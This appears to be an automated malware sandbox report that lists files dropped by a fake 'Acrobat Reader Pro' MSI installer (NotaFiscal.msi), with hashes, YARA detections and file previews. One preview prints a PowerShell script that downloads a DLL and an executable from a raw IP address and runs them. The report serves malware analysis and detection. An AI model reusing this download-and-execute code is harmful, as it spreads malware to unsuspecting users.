                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):19048
                                        Entropy (8bit):5.289710643417081
                                        Encrypted:false
                                        SSDEEP:384:VteJAtREI18+AQTnQ/chseVbhgW7R7IUZBlejsIj598zv:7W2Q/WseVbhgW7RUGlW9+v
                                        MD5:B63B78C565D23BF1867A4BB635521C47
                                        SHA1:3D117BFFECBA94D9A6460C298F42442BD3787931
                                        SHA-256:608F438624D2BDE2E49D0E09E8EA54D40187B5EDDF3F00AE6BB9B097C3E9689B
                                        SHA-512:28D1EA92E23114302C4F56FF0859D999A4C2151D4219A632896CF65F7DB8A547E628C7C5E14B80DDED3C8F8883FDD1797C1EEE78837CD0612865DD97018F250F
                                        Malicious:false
                                        Preview:@...e...........K.........a...y.......4..............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):104
                                        Entropy (8bit):4.560994822233001
                                        Encrypted:false
                                        SSDEEP:3:RrwNFRJ9fVl3HY9lFFH7uFYLhOw4yHXWS:RrwXz9fVBYtFH7uFYVKy39
                                        MD5:1DEC3D564DAC6CD61D3103715C22F2AF
                                        SHA1:25E9301692C92984B77B14A103D516B7A13BD358
                                        SHA-256:85CA620ED18F11871B60880FF3BD70088096B272A8DDB5B17F9BA17A722A6E4E
                                        SHA-512:A378CA062255BA78429476B6241BEFB947F9FD747CBBA98B049A2BE1FBD2774EB60A6C535DE86310B094080929F270059BB464E50DA0C521996FE5C6882E48B6
                                        Malicious:false
                                        Preview:ERROR: Exception calling "DownloadFile" with "2" argument(s): "Unable to connect to the remote server"..
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6668
                                        Entropy (8bit):3.5127462716425657
                                        Encrypted:false
                                        SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                        MD5:30C30EF2CB47E35101D13402B5661179
                                        SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                        SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                        SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                        Malicious:true
                                        Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1418
                                        Entropy (8bit):3.6844263681331086
                                        Encrypted:false
                                        SSDEEP:24:Q3KguuUyZASChuutu/uUyZ+SCarUMkW+SCcv2iRUMkWIoZot4RSiwpCviRUMkWIF:FySVEyXHZHwo04y/Hwo04q
                                        MD5:4E3993D1E152F07733D12C19F8889129
                                        SHA1:143675A3A0C17E7FF61C0EB86D394013594DA183
                                        SHA-256:6C9951BB983887DE4A21B440D78744F391B83033F69B531B32D78B4BB3F5FCCD
                                        SHA-512:484DFDE46E888D4A7C84F7C68081711005185B99FFC3A158B3B1F95030DBDA235E9780BEFFB65A22D6DD5E02AD15A508EB737F15ECD95D9EFAA7E7036FD9250A
                                        Malicious:true
                                        Preview:..$.P.r.o.c.N.a.m.e.2. .=. .".d.e.t.o.u.r.e.d...d.l.l.". . . .....$.W.e.b.F.i.l.e.2. .=. .".h.t.t.p.:././.2.0...1.2.5...1.4.1...2.2.4./.p.r.o./.$.P.r.o.c.N.a.m.e.2.". . . ..... . . .....(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.W.e.b.F.i.l.e.2.,.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.2.".). . . ..... . . .....$.P.r.o.c.N.a.m.e. .=. .".t.e.m.p...e.x.e.". . . .....$.W.e.b.F.i.l.e. .=. .".h.t.t.p.:././.2.0...1.2.5...1.4.1...2.2.4./.p.r.o./.$.P.r.o.c.N.a.m.e.". . . . ..... . . .....(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.W.e.b.F.i.l.e.,.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.".). . . .....S.t.a.r.t.-.P.r.o.c.e.s.s. .(.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.".). . ..... . .....$.p.r.o.c.=. .S.t.a.r.t.-.P.r.o.c.e.s.s. .-.F.i.l.e.P.a.t.h. .".c.m.d...e.x.e.". . .-.A.r.g.u.m.e.n.t.L.i.s.t. ."./.
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {819D06D6-E0AA-46C4-91C3-F6F4E17BC272}, Number of Words: 2, Subject: Acrobat Reader Pro, Author: 2125.651, Name of Creating Application: Acrobat Reader Pro (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Acrobat Reader Pro. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                        Category:dropped
                                        Size (bytes):1720832
                                        Entropy (8bit):6.565193585891705
                                        Encrypted:false
                                        SSDEEP:49152:9TiU8r6I5WCmR+JJke7awlK2FV9fXlVeIf:to6Le7a6f
                                        MD5:115C30AFBF3A6B6F7FD43B25A0D286D5
                                        SHA1:20446917C9F8AD50C1AD4432EA17682FE55BA7F4
                                        SHA-256:B25ADA06EA01E722AC2B932BAC8640C84355B29C8C298799E0EE797D18937524
                                        SHA-512:2EBBB6F283D9D62FFD4A32C4F0C22290507490DAD6B54B9844EF850633A1EA02DD89860A97BCD9279A2948EE615482BC91DEA1BDE81C50937C6A4122EA5CB00E
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6e7bc0.msi, Author: Joe Security
                                        • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\6e7bc0.msi, Author: Joe Security
                                        Preview:......................>.......................................................E.......a.......s.......................................Q...R...S...T...U...V...W...X...Y...Z...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=.......p...@...A...B...C...D...o.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Joe Sandbox View:
                                        • Filename: radarinstaller.exe, Detection: malicious, Browse
                                        • Filename: radarinstaller.exe, Detection: malicious, Browse
                                        • Filename: Danfe2372342.msi, Detection: malicious, Browse
                                        • Filename: Danfe2372342.msi, Detection: malicious, Browse
                                        • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                        • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1325
                                        Entropy (8bit):5.27328056049733
                                        Encrypted:false
                                        SSDEEP:24:YBd4DOjSzu6f+AdyDdsBL3IcoeDYcZpUD+AQeDXYDhiS4ILrI+Am:Yr4DO+9fbcaLecob3YD8S7Lcbm
                                        MD5:5214DAB3E59BF6306AFDCE0958A197E0
                                        SHA1:BB58C112EE1D044295DAE730CD15D05F01C140C6
                                        SHA-256:2D42636A005FD4C06BCEF9D558522C4A235535EB69A080FCE1B4A21EDFF616FF
                                        SHA-512:1342D0F506980342F3010B5121800BFCD564650589DC62587BE292B16063AAAEF71C8445F7A3D6A5E2F35F291B4265C72DED6432F739EE73046080650E9AF257
                                        Malicious:false
                                        Preview:...@IXOS.@.....@..JV.@.....@.....@.....@.....@.....@......&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}..Acrobat Reader Pro..NotaFiscal.msi.@.....@...u.@.....@........&.{819D06D6-E0AA-46C4-91C3-F6F4E17BC272}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader Pro......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{FC03EAC5-BA1F-49E5-8B24-3726A9E0E236}3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@.......@.....@.....@......&.{36C855C3-CBFC-424F-AA15-7C4DDD8F3200}0.02:\Software\2125.651\Acrobat Reader Pro\Version.@.......@.....@.....@......&.{F097E14A-4458-4E96-8676-952F7577E3C6},.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.e.s.k.t.o.p.\.M.o.d.u.l.o. .d.e. .S.e.g.u.r.a.n...a.\..@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@....".,.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):634784
                                        Entropy (8bit):6.564827321629019
                                        Encrypted:false
                                        SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                        MD5:A619F980C1BAA155F7CFB79553AA10B1
                                        SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                        SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                        SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.162887092089409
                                        Encrypted:false
                                        SSDEEP:12:JSbX72FjGAGiLIlHVRpZh/7777777777777777777777777vDHFOSzuXptLuit/z:JUQI5toSzuXniF
                                        MD5:B3CA35F01B77A86BC9C4A698DA64A797
                                        SHA1:D1E8E19CF2E52BFAACE45887390CA9C6690369AA
                                        SHA-256:309604D83911B3FD2293A2FCF665C5B543679E6502AF9CAAA0C8068C26524850
                                        SHA-512:7099F153CB6E4E22E0A17ADAED07DC8E22A40E14AB5C9C0B57D2F56D1FA3142442912575D34CA65A8BBB053BE6766FCEE123B68CF91DFEC840DFFC3A564DB937
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5324744365403191
                                        Encrypted:false
                                        SSDEEP:48:Z8PhzuRc06WXJ0BT50pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:Uhz13BTn2bUYdRCyUY
                                        MD5:976A0F5B151B29EC32E6221BBA94631F
                                        SHA1:D12728FE03ECAEE4A3529BD20F5A816ADF230BE9
                                        SHA-256:64F3354560A10E5731107EF32B3E71FFF2B46D026F4A015747E297F24DA83716
                                        SHA-512:188A31FBCD9EEC4F068222C0AD49D4D99445B2A15EA2E5E09516AA66A52FB0F51A06B6B0E1A75EEDF75E70FECE0ABD73AAD578FA4148F7FB6B289F19E8885407
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):192827
                                        Entropy (8bit):5.391985284322795
                                        Encrypted:false
                                        SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bF4:i0LVlAG
                                        MD5:61000BDC3858AF1190C0CE36E9B8A1FE
                                        SHA1:285340D91926AAADA01E17D4FDFFF8CF08B320F8
                                        SHA-256:805454C6DE84510B84BC8AA30693B088F7D512B14BAD8E29B28958290B651206
                                        SHA-512:7BC80BAF8450CD0E275A352718114DC453EAEB25DE85D90AB02C27EDB0CE35FC2DB6737211033F792AD899BABF478B45E32DB97C31CDE568D4980AE180152946
                                        Malicious:false
                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5324744365403191
                                        Encrypted:false
                                        SSDEEP:48:Z8PhzuRc06WXJ0BT50pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:Uhz13BTn2bUYdRCyUY
                                        MD5:976A0F5B151B29EC32E6221BBA94631F
                                        SHA1:D12728FE03ECAEE4A3529BD20F5A816ADF230BE9
                                        SHA-256:64F3354560A10E5731107EF32B3E71FFF2B46D026F4A015747E297F24DA83716
                                        SHA-512:188A31FBCD9EEC4F068222C0AD49D4D99445B2A15EA2E5E09516AA66A52FB0F51A06B6B0E1A75EEDF75E70FECE0ABD73AAD578FA4148F7FB6B289F19E8885407
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2307692803689392
                                        Encrypted:false
                                        SSDEEP:48:7SrupK+CFXJtT5N6pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:mr5VTL2bUYdRCyUY
                                        MD5:A83DC5AC39FD7A9782BA366BFB092230
                                        SHA1:03CAB108A240FDFD9F4590694F89AA0FC6A90B78
                                        SHA-256:0C6BBA03C22187B34E2A909EFD1CC27D78DE0BFC568AC7A1CE6A1FB428C9E3D8
                                        SHA-512:256931E8EBA3D3AAEFE16EDBD4F14B5C62264B906ECF08F729F1753BDE9E6F210E9BB624C6239762892DF8278A37B51BEC83BBA1E6CDEB441C2595F72479FEAE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
